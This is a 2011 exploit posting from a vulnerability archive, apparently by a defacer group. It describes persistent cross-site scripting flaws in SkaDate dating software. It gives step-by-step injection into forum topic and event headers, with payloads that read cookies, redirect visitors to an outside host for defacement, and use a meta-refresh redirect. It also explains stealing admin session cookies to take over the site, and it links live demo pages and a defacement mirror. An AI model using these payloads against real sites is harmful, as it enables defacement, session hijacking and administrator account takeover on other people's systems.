SecurityvulnsSECURITYVULNS:DOC:25416Skadate Multiple Persistent Cross Site Scripting Vulnerabilities (Undisclosed New Vulnerability)
Exploit Title: [Skadate Persistent Cross Site
Scripting Vulnerability]
Google Dork: [Powered by SkaDate dating]
Date: [2 January 2011]
Author: Akastep
Software Link: http://www.skadate.com
Version: SkaDate dating software
Tested on: nginx/0.7.62 (php version: PHP/5.2.14)
----- [ Exploit: Persistent Cross Site Scripting
Vulnerability in Skadate] --------
Login to Skadate system:
Go to forum section and open new topic:
In header of topic just inject your code:
For ex: <script>alert(document.cookie);</script>
Or for deface that forum section:
For ex:
<script>location.replace("http://upw_ned.com/");</script>
Or Just use HTML Meta redirect:
<meta http-equiv="refresh"
content="0;url=http://upw_ned.com/u4pwned/">
And Post the topic.
Demo:
http://www.skadate.com/demo/forum/forum.php?forum_id=9
Or:
http://www.skadate.com/demo/forum/topic.php?topic_id=133
Defacement of skadate forum section:
http://mirror-az.com/mirror/?id=8338
Second Vuln again Persistent XSS:
Go to events and Create New Event
And inject in header of will created event javascript
sceanrio:
<script>alert(document.cookie);</script>
Demo:
http://www.skadate.com/demo/member/event.php?eventId=78
Also this vuln will affect anyone of who views your
profile.
Attacker who can expoit this vulnerability can deface
site (using javascript or html meta redirect way)
Or he/she can grab admin credentials (cookie session)
and then using Minibrowser login to system as admin with
stealed cookies.
/Akastep
WwW.Pirates-CrEW.org
wWw.AzDeFaCers.Org
#############################################################################################
Allahu
Akbar!
#############################################################################################